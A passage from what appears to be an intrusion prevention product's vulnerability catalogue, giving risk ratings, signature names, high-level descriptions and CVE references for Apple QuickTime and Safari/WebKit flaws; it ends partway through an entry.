Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-529-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Apple QuickTime. The vulnerability is due to insufficient validation of coordinate values in textBox and defaultTextBox in QuickTime TeXML files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted TeXML file. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-TextId_Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption

References:

CVE-2013-1015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1015

OSVDB-93615
http://www.osvdb.org/93615

Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-460-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Apple QuickTime. The vulnerability is due to insufficient validation of a string length in QuickTime3GPP.qtx when processing the transform attribute inside QuickTime TeXML files. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted TeXML file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.

Situation:

File-TextId_Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow

References:

CVE-2012-0663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0663

BID-53571
http://www.securityfocus.com/bid/53571

OSVDB-81934
http://www.osvdb.org/81934

Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-461-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Apple Quicktime. The vulnerability is due to improper validation on parameter lengths of Text Track Descriptors. The overly long parameter can be copied by the vulnerable code into a fixed length heap buffer. This vulnerability can be exploited by a remote attacker by enticing the target user to open a specially crafted text track or movie file with the affected application. Successful exploitation could result in arbitrary code injection and execution in the context of the currently logged-in user.

Situation:

File-TextId_Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow

References:

CVE-2012-0664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0664

BID-53574
http://www.securityfocus.com/bid/53574

OSVDB-81935
http://www.osvdb.org/81935

Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access

About this vulnerability:

A vulnerability in Apple Computer Quicktime

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There exists an out-of-bounds memory access vulnerability in Apple QuickTime. The vulnerability can be used to execute arbitrary code or cause a denial of service condition.

Situation:

File-MPEG_Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access

References:

CVE-2015-3668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3668

Apple-QuickTime-Udta-Atom-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime; Apple iTunes

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Apple QuickTime. The flaw is caused by insufficient checks imposed on the value that defines the size of a udta Atom in a MOV file. This may lead to a heap buffer overflow, which may be exploited by an attacker to inject and execute arbitrary code in the security context of the currently logged in user. The behaviour of the affected application is fully dependent on the outcome of an attack attempt. In the case of an unsuccessful attack, the application will terminate. In the case where the flow of the vulnerable process is successfully diverted, the behaviour of the target host system is fully dependent on the intention of the supplied code. In the case where process flow is diverted as a result of an attack, the attacker supplied code will be executed with the privileges of the currently logged on user.

Situation:

File-MPEG_Apple-QuickTime-Udta-Atom-Buffer-Overflow

References:

CVE-2006-1460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1460

BID-17953
http://www.securityfocus.com/bid/17953

Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability

About this vulnerability:

A heap overflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-100-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in Apple QuickTime. The flaw is caused by improper parsing of forged size fields in user data Atoms (udta). By setting this field to an overly large value, an integer overflow occurs resulting in an exploitable heap overflow. Successful exploitation allows remote attackers to execute arbitrary code under the context of the currently logged-in user.

Situation:

HTTP_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
File-MPEG_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability

References:

CVE-2007-0714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0714

BID-22844
http://www.securityfocus.com/bid/22844

OSVDB-33902
http://www.osvdb.org/33902

Apple-QuickTime-Vr-Tkhd-Heap-Corruption

About this vulnerability:

A vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There exists a heap buffer memory corruption vulnerability in Apple QuickTime. The vulnerability is due to a logic error while processing the "VR Track Header" atoms in QuickTime movie files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted QuickTime movie file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected Apple QuickTime process will terminate abnormally.

Situation:

File-MPEG_Apple-QuickTime-Vr-Tkhd-Atom-Heap-Corruption

References:

CVE-2009-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0002

BID-33384
http://www.securityfocus.com/bid/33384

OSVDB-51525
http://www.osvdb.org/51525

Apple-Safari-Arbitrary-Code-Execution

About this vulnerability:

An Apple Safari Arbitrary Code Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-745-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

OS X

Software:

Safari

Type:

Input Validation

Description:

A vulnerability in Apple Safari, versions before 5.1.1, which allows remote attackers to execute arbitrary code via a crafted web site.

Situation:

File-Text_Apple-Safari-Arbitrary-Code-Execution

References:

CVE-2011-3230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3230

OSVDB-76389
http://www.osvdb.org/76389

Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-300-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Safari

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Apple Safari. The vulnerability is due to an error while processing CSS format arguments. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page with a vulnerable application, which may lead to code execution in the context of the current user.

Situation:

HTTP_SS-Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
File-Text_Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption

References:

CVE-2010-0046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0046

BID-38684
http://www.securityfocus.com/bid/38684

Apple-Safari-CSS-Style-Overflow-DOS

About this vulnerability:	Overtly long CSS style string
Risk:	Low
First detected in:	sgpkg-ips-580-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Safari;Chrome
Type:	Buffer Overflow
Description:	A vulnerability in older Apple Webkit based browsers may cause denial of service when parsing overtly long CSS strings.
Situation:	File-Text_Apple-Safari-CSS-Style-Overflow-DOS

Apple-Safari-Desktop-File-Download

About this vulnerability:	A vulnerability in Apple Safari for Windows
Risk:	Low
First detected in:	sgpkg-ips-157-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Safari
Type:	Insecure Configuration
Description:	There is a weakness in the default configuration of Apple Safari for Windows. The default configuration downloads files that are not handled by any particular application to the desktop without notification.
Situation:	HTTP_CSU-Suspicious-Dynamic-Link-Library-Download-Request

Apple-Safari-Feed-URI-Denial-of-Service

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Moderate

First detected in:

sgpkg-ips-579-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

There is a denial of service vulnerbility in Apple Safari. The product fails to parse certain crafted URIs.

Situation:

File-Text_Apple-Safari-Feed-URI-Denial-of-Service

References:

BID-24460
http://www.securityfocus.com/bid/24460

Apple-Safari-For-Windows-Protocol-Handler-Command-Injection

About this vulnerability:

Apple Safari for Windows Protocol Handler Command Injection Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Safari

Type:

Code Injection

Description:

A vulnerability exists in Apple Safari for Windows 3 which allows remote attackers to execute arbitrary commands via shell metacharacters within the URI in the SRC of an IFRAME.

Situation:

File-Text_Apple-Safari-For-Windows-Protocol-Handler-Command-Injection

References:

CVE-2007-3186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3186

BID-24434
http://www.securityfocus.com/bid/24434

OSVDB-38542
http://www.osvdb.org/38542

Apple-Safari-For-Windows-URL-Spoofing

About this vulnerability:

Apple Safari for Windows URL Spoofing Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Safari

Type:

Browser

Description:

A vulnerability exists in Apple Safari for Windows 3.1.1 which allows remote attackers to spoof the address bar and conduct fishing attacks using a specially crafted URL.

Situation:

File-Text_Apple-Safari-For-Windows-URL-Spoofing

References:

CVE-2008-1999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1999

OSVDB-44658
http://www.osvdb.org/44658

Apple-Safari-HTML-Image-Element-Handling-Use-After-Free

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-298-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Safari

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Apple Safari. The vulnerability is due to a use-after-free error when handling HTML image elements. Remote attackers can exploit this vulnerability to execute arbitrary code on the target machine by enticing a user into opening a specially crafted HTML document.

Situation:

HTTP_SS-Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-3
File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-2

References:

CVE-2010-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0054

BID-38691
http://www.securityfocus.com/bid/38691

OSVDB-62949
http://www.osvdb.org/62949

Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-1494-5242

Last changed:

sgpkg-ips-1494-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A URL spoofing vulnerability has been reported in macOS Safari web browser. The vulnerability is due to lack of proper validation of user-supplied data. A remote attacker could exploit the vulnerability by enticing a victim to visit a crafted link or open a crafted file. A successful attack results in misleading message displayed in the address bar of the application and cause insecure actions.

Situation:

File-Text_Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing

References:

CVE-2022-32816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32816

Apple-Safari-Insecure-JavaScript-Usage

About this vulnerability:

Safari Null Windows file reference Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Safari

Type:

Misconfiguration

Description:

Certain javascript can cause a denial of service condition in older Apple Safari Browsers. E.g. including null file references in file:// -links or infinite document.write() -loops.

Situation:

File-Text_Apple-Safari-Windows-JavaScript-Infinite-Document-Write
File-Text_Apple-Safari-Null-Windows-File-Reference-DoS

References:

CVE-2008-2001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2001

OSVDB-44661
http://www.osvdb.org/44661

Apple-Safari-JS-Multibyte-Char-Escape

About this vulnerability:	Apple Webkit JS multibyte character escape sequence
Risk:	Low
First detected in:	sgpkg-ips-580-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Safari
Type:	Insecure Configuration
Description:	A vulnerability in older Apple Webkit based browsers may cause denial of service when using javascript escape on multibyte character strings.
Situation:	File-Text_Apple-Safari-JS-Multibyte-Char-Escape

Apple-Safari-KwqListIteratorImpl-DoS

About this vulnerability:

Apple Webkit KwqListIteratorImpl() HTML Tag Handling Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Insecure Configuration

Description:

A vulnerability in older Apple Webkit based browsers may cause a denial of service condition when long integers are used in table cellspacing attribute.

Situation:

File-Text_Apple-Safari-KwqListIteratorImpl-DoS

References:

CVE-2006-1986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1986

BID-17634
http://www.securityfocus.com/bid/17634

OSVDB-24823
http://www.osvdb.org/24823

Apple-Safari-Objc-MsgSend-RTP-DoS

About this vulnerability:

Safari objc_msgSend_rtp() Tag handling DoS

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Misconfiguration

Description:

Multiple "scrolling" -attributes within a frame html tag. This may indicate an attack against Apple Safari browsers

Situation:

File-Text_Apple-Safari-Objc-MsgSend-RTP-DoS

References:

CVE-2006-1987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1987

BID-17634
http://www.securityfocus.com/bid/17634

Apple-Safari-Parent.close-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A code execution vulnerability exists in Apple Safari. The vulnerability is due to an error while handling the termination and subsequent referencing between child and parent windows. Remote attackers can exploit this vulnerability to execute arbitrary code on the target machine by enticing a user into opening a specially crafted HTML document. Note that popup windows must be enabled in order to successfully exploit this vulnerability. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

Situation:

File-Text_Apple-Safari-Parent.close-Code-Execution

References:

CVE-2010-1939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1939

BID-39990
http://www.securityfocus.com/bid/39990

OSVDB-64482
http://www.osvdb.org/64482

Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-298-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Safari

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Apple Safari. The vulnerability is due to a use-after-free error when handling HTML elements containing right-to-left displayed text. Remote attackers can exploit this vulnerability to execute arbitrary code on the target machine by enticing a user into opening a specially crafted HTML document.

Situation:

HTTP_SS-Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
File-Text_Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free

References:

CVE-2010-0049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0049

BID-38689
http://www.securityfocus.com/bid/38689

OSVDB-62942
http://www.osvdb.org/62942

Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Input Validation

Description:

A cross-origin security bypass vulnerability exists in Apple Safari. The vulnerability is due to improper decoding of URLs. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page. Successful exploitation could lead to stealing document cookies and domain and bypassing security restrictions which may lead to origin spoofing.

Situation:

File-Text_Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass

References:

CVE-2015-1126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1126

BID-73977
http://www.securityfocus.com/bid/73977

Apple-Safari-Webkit-Arbitrary-File-Creation

About this vulnerability:

An Apple Safari Webkit Arbitrary File Creation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-741-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Webkit

Type:

Insecure Configuration

Description:

A vulnerability in Apple Safari Webkit, versions before 5.0.6, which allows remote attackers to upload and execute arbitrary code via a crafted website.

Situation:

File-Text_Apple-Safari-Webkit-Arbitrary-File-Creation

References:

CVE-2011-1774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774

OSVDB-74017
http://www.osvdb.org/74017

Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A vulnerability has been reported in Apple Safari's WebKit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to the way the vulnerable application handles references to attribute objects and destroys them. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.

Situation:

File-Text_Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution

References:

CVE-2010-1119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1119

BID-40642
http://www.securityfocus.com/bid/40642

Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Apple Safari.

Situation:

File-Text_Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption

References:

CVE-2012-1520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1520

BID-54680
http://www.securityfocus.com/bid/54680

OSVDB-84139
http://www.osvdb.org/84139

Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A code execution vulnerability exists in Apple Safari's Webkit.

Situation:

HTTP_SS-Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
File-Text_Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution

References:

CVE-2010-1392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1392

BID-40644
http://www.securityfocus.com/bid/40644

Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A vulnerability has been reported in Apple Safari's Webkit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to the way the vulnerable application handles text objects via CSS. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.

Situation:

File-Text_Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution

References:

CVE-2010-1770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1770

BID-40620
http://www.securityfocus.com/bid/40620

Apple-Safari-Webkit-CSS-Title-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Apple Safari. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Apple-Safari-Webkit-CSS-Title-Memory-Corruption

References:

CVE-2012-3684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3684

OSVDB-85376
http://www.osvdb.org/85376

Apple-Safari-Webkit-Floating-Point-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-241-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Safari

Type:

Buffer Overflow

Description:

There is a vulnerability in Apple's Webkit application programming interface, used in the Safari web browser. The vulnerability is due to incorrect parsing of floating point numbers. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation results in execution of arbitrary code in the security context of the current user. An unsuccessful attempt may abnormally terminate the affected application.

Situation:

HTTP_SS-Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
File-Text_Apple-Safari-Webkit-Floating-Point-Buffer-Overflow

References:

CVE-2009-2195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2195

BID-36023
http://www.securityfocus.com/bid/36023

Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Apple Safari web browser. The vulnerability is due to a design error when processing floating point data types. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behavior of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
File-Text_Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution

References:

CVE-2010-1807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807

BID-43047
http://www.securityfocus.com/bid/43047

Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A code execution vulnerability exists in Apple Safari. The vulnerability is due to a use-after-free error when clearing a body or iframe element dynamically using script code. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

Situation:

File-Text_Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption

References:

CVE-2011-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0221

BID-48844
http://www.securityfocus.com/bid/48844

OSVDB-73998
http://www.osvdb.org/73998

Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Safari

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

There is a code execution vulnerability in Apple Safari. The vulnerability is due to memory corruption when processing the onchange event for menus. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behavior of the target machine depends on the intention of the injected code, which runs in the security context of the logged on user.

Situation:

HTTP_SS-Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
File-Text_Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption

References:

CVE-2010-1814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1814

BID-43083
http://www.securityfocus.com/bid/43083

Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A vulnerability has been reported in Apple Safari's WebKit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to the way the vulnerable application removes a particular container element containing another element with a specific attribute. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.

Situation:

File-Text_Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution

References:

CVE-2010-1396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1396

BID-40647
http://www.securityfocus.com/bid/40647

BID-40620
http://www.securityfocus.com/bid/40620

Apple-Safari-Webkit-Range-Object-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Apple Safari WebKit. The vulnerability is due to an error while parsing a range object within the Document Object Model. The vulnerable code does not account for DOM manipulation by event listeners. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted web page. This can lead to code execution in the context of the current user. Where code execution is not successful, the application may terminate abnormally.

Situation:

HTTP_SS-Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
File-Text_Apple-Safari-Webkit-Range-Object-Remote-Code-Execution

References:

CVE-2011-0115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0115

BID-46746
http://www.securityfocus.com/bid/46746

Apple-Safari-Webkit-Rendering-Counter-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A vulnerability has been reported in Apple Safari's WebKit that could allow remote attackers to execute arbitrary code on a vulnerable system. The vulnerability is due to an error in WebKit's support for generated content. When utilizing generated content on an element, the vulnerable code inserts multiple references to the generated element. When the generated page is being destroyed the vulnerable application will navigate through the references to discover more elements to destroy. Remote attackers could exploit this vulnerability by enticing the target user to open a maliciously crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the current user. An unsuccessful attempt will terminate the affected application abnormally.

Situation:

File-Text_Apple-Safari-Webkit-Rendering-Counter-Code-Execution

References:

CVE-2010-1784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1784

BID-42020
http://www.securityfocus.com/bid/42020

Apple-Safari-Webkit-Selections-Use-After-Free

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X; Windows

Software:

Safari

Type:

Malfunction

Description:

There is a code execution vulnerability in Apple Safari. The vulnerability is due to a use-after-free error when processing selections. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page. In attack scenarios where code execution is successful the behavior of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Apple-Safari-Webkit-Selections-Use-After-Free
File-Text_Apple-Safari-Webkit-Selections-Use-After-Free

References:

CVE-2010-1812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1812

BID-43079
http://www.securityfocus.com/bid/43079

Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A heap corruption vulnerability has been found in WebKit. The vulnerability is located in the code that handles Scalable Vector Graphics (SVG) objects. The vulnerable code doesn't properly handle reference counting when updating SVG markers, causing a use-after-free condition. A remote attacker could entice a target user to view a maliciously crafted web page that exploits this vulnerability to run arbitrary code in the target user's security context.

Situation:

File-TextId_Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption

References:

CVE-2011-1453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1453

OSVDB-74013
http://www.osvdb.org/74013

Apple-Safari-Webkit-SVG-Memory-Corruption

About this vulnerability:

A vulnerability in Apple Computer Safari

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

A heap memory corruption vulnerability has been found in the WebKit component of Apple Safari. The vulnerability is located in the code that handles Scalable Vector Graphics (SVG) objects and causes access to corrupted memory. A remote attacker could entice a target user to view a maliciously crafted web page that exploits this vulnerability to run arbitrary code in the target user's security context.

Situation:

File-Text_Apple-Safari-Webkit-SVG-Memory-Corruption

References:

CVE-2011-0222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0222

BID-48844
http://www.securityfocus.com/bid/48844

OSVDB-73999
http://www.osvdb.org/73999

Apple-Safari-Webkit-Use-After-Free-Code-Execution

About this vulnerability:

A vulnerability in Apple Safari

Risk:

Low

